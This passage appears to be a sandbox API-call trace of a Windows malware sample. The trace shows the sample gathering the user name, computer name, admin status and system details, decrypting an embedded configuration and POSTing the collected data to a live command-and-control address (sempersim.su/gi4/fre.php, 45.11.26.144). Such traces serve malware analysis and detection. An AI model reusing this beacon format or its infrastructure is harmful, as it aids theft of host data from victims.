returned 0x5b0000 [0117.069] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5c9390 [0117.069] GetProcessHeap () returned 0x5b0000 [0117.070] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0117.071] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0xffffffff [0117.071] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9"), lpSecurityAttributes=0x0) returned 1 [0117.072] GetProcessHeap () returned 0x5b0000 [0117.072] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f50) returned 0x5ccd70 [0117.073] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0117.073] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s.%s", arglist=0xdf9a8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0117.073] GetProcessHeap () returned 0x5b0000 [0117.074] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c7590 [0117.074] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0117.075] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0117.075] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0117.075] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.076] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0117.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7590 | out: hHeap=0x5b0000) returned 1 [0117.077] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1388) returned 0x5ccd70 [0117.077] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0117.077] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x11c) returned 0x5cc9f0 [0117.078] RtlGetVersion (in: lpVersionInformation=0x5cc9f0 | out: lpVersionInformation=0x5cc9f0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0117.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0117.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfb18 | out: lpSystemTimeAsFileTime=0xdfb18*(dwLowDateTime=0xa6a590e, dwHighDateTime=0x1d8a8a4)) [0117.079] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7) returned 0x5ca900 [0117.079] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1a5) returned 0x5cc9f0 [0117.079] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0000) returned 0xad0020 [0117.106] GetProcessHeap () returned 0x5b0000 [0117.110] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0xad0020 | out: hHeap=0x5b0000) returned 1 [0117.114] GetProcessHeap () returned 0x5b0000 [0117.114] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0117.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0117.115] GetUserNameW (in: lpBuffer=0x5c9390, pcbBuffer=0xdfb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdfb74) returned 1 [0117.118] GetProcessHeap () returned 0x5b0000 [0117.118] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0117.118] GetProcessHeap () returned 0x5b0000 [0117.118] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0117.119] GetComputerNameW (in: lpBuffer=0x5c9390, nSize=0xdfb74 | out: lpBuffer="XC64ZB", nSize=0xdfb74) returned 1 [0117.119] GetProcessHeap () returned 0x5b0000 [0117.119] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0117.120] GetCurrentThread () returned 0xfffffffe [0117.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0117.121] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0xdfb74 | out: TokenHandle=0xdfb74*=0x0) returned 0 [0117.121] GetLastError () returned 0x3f0 [0117.121] GetCurrentProcess () returned 0xffffffff [0117.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0117.122] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdfb74 | out: TokenHandle=0xdfb74*=0x1fc) returned 1 [0117.122] GetProcessHeap () returned 0x5b0000 [0117.122] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0117.122] GetProcessHeap () returned 0x5b0000 [0117.122] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cbc90 [0117.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0117.123] GetTokenInformation (in: TokenHandle=0x1fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdfb70 | out: TokenInformation=0x0, ReturnLength=0xdfb70) returned 0 [0117.123] GetProcessHeap () returned 0x5b0000 [0117.123] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0117.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0117.124] GetTokenInformation (in: TokenHandle=0x1fc, TokenInformationClass=0x1, TokenInformation=0x5c8560, TokenInformationLength=0x24, ReturnLength=0xdfb70 | out: TokenInformation=0x5c8560, ReturnLength=0xdfb70) returned 1 [0117.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0117.125] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5c8568*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x5c9390, cchName=0xdfb60, ReferencedDomainName=0x5cbc90, cchReferencedDomainName=0xdfb64, peUse=0xdfb5c | out: Name="RDhJ0CNFevzX", cchName=0xdfb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0xdfb64, peUse=0xdfb5c) returned 1 [0117.129] GetProcessHeap () returned 0x5b0000 [0117.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f44) returned 0x5cf140 [0117.130] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0117.130] wvsprintfW (in: param_1=0x5cf140, param_2="%s", arglist=0xdfb4c | out: param_1="XC64ZB") returned 6 [0117.130] GetProcessHeap () returned 0x5b0000 [0117.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5bc3e0 [0117.130] GetProcessHeap () returned 0x5b0000 [0117.131] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf140 | out: hHeap=0x5b0000) returned 1 [0117.131] GetProcessHeap () returned 0x5b0000 [0117.131] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0117.131] CloseHandle (hObject=0x1fc) returned 1 [0117.131] GetProcessHeap () returned 0x5b0000 [0117.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbc90 | out: hHeap=0x5b0000) returned 1 [0117.132] GetProcessHeap () returned 0x5b0000 [0117.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0117.132] GetProcessHeap () returned 0x5b0000 [0117.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc3e0 | out: hHeap=0x5b0000) returned 1 [0117.132] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0117.133] GetDesktopWindow () returned 0x10010 [0117.134] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0117.134] GetWindowRect (in: hWnd=0x10010, lpRect=0xdfb68 | out: lpRect=0xdfb68) returned 1 [0117.135] GetProcessHeap () returned 0x5b0000 [0117.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8) returned 0x5ca9a0 [0117.135] GetProcessHeap () returned 0x5b0000 [0117.135] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9a0 | out: hHeap=0x5b0000) returned 1 [0117.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0117.136] GetUserNameW (in: lpBuffer=0xdf968, pcbBuffer=0xdfb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdfb70) returned 1 [0117.137] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76be0000 [0117.591] GetProcAddress (hModule=0x76be0000, lpProcName="NetUserGetInfo") returned 0x6f9733a0 [0117.733] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0xdfb74 | out: bufptr=0x5bbe58*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x8510da, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0118.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.273] AllocateAndInitializeSid (in: pIdentifierAuthority=0xdfb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xdfb68 | out: pSid=0xdfb68*=0x5bc458*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0118.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.273] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x5bc458*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdfb6c | out: IsMember=0xdfb6c) returned 1 [0118.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.275] GetNativeSystemInfo (in: lpSystemInfo=0xdfb44 | out: lpSystemInfo=0xdfb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0118.275] GetProcessHeap () returned 0x5b0000 [0118.275] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5bbd80 [0118.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.276] CryptAcquireContextW (in: phProv=0xdf920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdf920*=0x0) returned 0 [0118.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.708] CryptAcquireContextW (in: phProv=0xdf920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdf920*=0x5caba0) returned 1 [0118.717] GetProcessHeap () returned 0x5b0000 [0118.717] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0118.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.718] CryptImportKey (in: hProv=0x5caba0, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdf924 | out: phKey=0xdf924*=0x5be048) returned 1 [0118.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.720] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdf91c*=0x1, dwFlags=0x0) returned 1 [0118.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.721] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0118.721] GetProcessHeap () returned 0x5b0000 [0118.721] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0118.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.722] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5bbd80, pdwDataLen=0xdf974 | out: pbData=0x5bbd80, pdwDataLen=0xdf974) returned 1 [0118.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.728] CryptDestroyKey (hKey=0x5be048) returned 1 [0118.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0118.729] CryptReleaseContext (hProv=0x5caba0, dwFlags=0x0) returned 1 [0118.729] GetProcessHeap () returned 0x5b0000 [0118.729] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5cc628 [0118.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0118.730] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0118.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0118.731] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0118.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0118.732] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0118.732] GetProcessHeap () returned 0x5b0000 [0118.732] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0118.732] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdf930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdf950 | out: ppResult=0xdf950*=0x5cb100*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf398*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0120.157] GetProcessHeap () returned 0x5b0000 [0120.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0120.157] socket (af=2, type=1, protocol=6) returned 0x250 [0120.158] connect (s=0x250, name=0x5cf398*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0120.229] FreeAddrInfoW (pAddrInfo=0x5cb100*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf398*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0120.229] GetProcessHeap () returned 0x5b0000 [0120.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5d1c30 [0120.229] GetProcessHeap () returned 0x5b0000 [0120.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d3e18 [0120.230] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0120.231] wvsprintfA (in: param_1=0x5d3e18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdf958 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0120.231] GetProcessHeap () returned 0x5b0000 [0120.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5d1cb8 [0120.231] GetProcessHeap () returned 0x5b0000 [0120.231] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0120.231] GetProcessHeap () returned 0x5b0000 [0120.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2f60 [0120.231] GetProcessHeap () returned 0x5b0000 [0120.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d3e18 [0120.232] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0120.233] wvsprintfA (in: param_1=0x5d3e18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdf958 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 288\r\nConnection: close\r\n\r\n") returned 236 [0120.233] GetProcessHeap () returned 0x5b0000 [0120.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5d1d70 [0120.233] GetProcessHeap () returned 0x5b0000 [0120.233] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0120.233] send (s=0x250, buf=0x5d1d70*, len=236, flags=0) returned 236 [0120.235] send (s=0x250, buf=0x5ccd70*, len=288, flags=0) returned 288 [0120.235] GetProcessHeap () returned 0x5b0000 [0120.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d3e18 [0120.235] recv (in: s=0x250, buf=0x5d3e18, len=4048, flags=0 | out: buf=0x5d3e18*) returned 229 [0121.930] GetProcessHeap () returned 0x5b0000 [0121.931] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d1d70 | out: hHeap=0x5b0000) returned 1 [0121.931] GetProcessHeap () returned 0x5b0000 [0121.931] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0121.931] GetProcessHeap () returned 0x5b0000 [0121.932] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d1cb8 | out: hHeap=0x5b0000) returned 1 [0121.932] GetProcessHeap () returned 0x5b0000 [0121.932] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d1c30 | out: hHeap=0x5b0000) returned 1 [0121.932] closesocket (s=0x250) returned 0 [0121.933] GetProcessHeap () returned 0x5b0000 [0121.933] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0121.933] GetProcessHeap () returned 0x5b0000 [0121.934] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc628 | out: hHeap=0x5b0000) returned 1 [0121.934] GetProcessHeap () returned 0x5b0000 [0121.934] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bbd80 | out: hHeap=0x5b0000) returned 1 [0121.934] GetProcessHeap () returned 0x5b0000 [0121.934] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0121.934] GetProcessHeap () returned 0x5b0000 [0121.934] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc628 [0121.935] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0121.936] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc628 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0121.936] GetProcessHeap () returned 0x5b0000 [0121.936] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5d4df0 [0121.937] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0121.938] wvsprintfW (in: param_1=0x5d4df0, param_2="%s\\%s", arglist=0xdf988 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0121.938] GetProcessHeap () returned 0x5b0000 [0121.938] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5d1b38 [0121.938] GetProcessHeap () returned 0x5b0000 [0121.939] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4df0 | out: hHeap=0x5b0000) returned 1 [0121.939] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0121.939] GetProcessHeap () returned 0x5b0000 [0121.939] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f50) returned 0x5d4df0 [0121.940] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0121.941] wvsprintfW (in: param_1=0x5d4df0, param_2="%s\\%s.%s", arglist=0xdf99c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0121.941] GetProcessHeap () returned 0x5b0000 [0121.941] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c6e90 [0121.941] GetProcessHeap () returned 0x5b0000 [0121.941] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4df0 | out: hHeap=0x5b0000) returned 1 [0121.941] GetProcessHeap () returned 0x5b0000 [0121.942] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d1b38 | out: hHeap=0x5b0000) returned 1 [0121.942] GetProcessHeap () returned 0x5b0000 [0121.942] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc628 | out: hHeap=0x5b0000) returned 1 [0121.943] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0xdfb34, dwLength=0x1c | out: lpBuffer=0xdfb34*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0121.944] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0xdfb14, dwLength=0x1c | out: lpBuffer=0xdfb14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0121.945] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0121.947] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.948] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb")) returned 0 [0121.948] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x250 [0121.950] SetFilePointer (in: hFile=0x250, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.951] WriteFile (in: hFile=0x250, lpBuffer=0x4f0000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0xdfb3c, lpOverlapped=0x0 | out: lpBuffer=0x4f0000*, lpNumberOfBytesWritten=0xdfb3c*=0x4, lpOverlapped=0x0) returned 1 [0121.952] CloseHandle (hObject=0x250) returned 1 [0121.953] GetProcessHeap () returned 0x5b0000 [0121.954] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6e90 | out: hHeap=0x5b0000) returned 1 [0121.954] GetProcessHeap () returned 0x5b0000 [0121.954] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0121.954] GetProcessHeap () returned 0x5b0000 [0121.955] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0121.955] GetProcessHeap () returned 0x5b0000 [0121.955] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0121.955] GetProcessHeap () returned 0x5b0000 [0121.955] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0121.955] GetProcessHeap () returned 0x5b0000 [0121.955] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca900 | out: hHeap=0x5b0000) returned 1 [0121.955] GetProcessHeap () returned 0x5b0000 [0121.956] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c4fd0 | out: hHeap=0x5b0000) returned 1 [0121.956] GetProcessHeap () returned 0x5b0000 [0121.956] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc0e0 | out: hHeap=0x5b0000) returned 1 [0121.956] GetProcessHeap () returned 0x5b0000 [0121.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1388) returned 0x5c4fd0 [0121.956] GetProcessHeap () returned 0x5b0000 [0121.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5cf308 [0121.956] GetProcessHeap () returned 0x5b0000 [0121.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0121.957] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0121.958] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0121.958] GetProcessHeap () returned 0x5b0000 [0121.958] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5d3e18 [0121.958] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0121.959] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\%s", arglist=0xdf9e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0121.959] GetProcessHeap () returned 0x5b0000 [0121.959] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5cc628 [0121.959] GetProcessHeap () returned 0x5b0000 [0121.960] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0121.960] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0121.961] GetProcessHeap () returned 0x5b0000 [0121.961] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f50) returned 0x5d3e18 [0121.961] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0121.962] wvsprintfW (in: param_1=0x5d3e18, param_2="%s\\%s.%s", arglist=0xdf9f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 55 [0121.962] GetProcessHeap () returned 0x5b0000 [0121.962] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 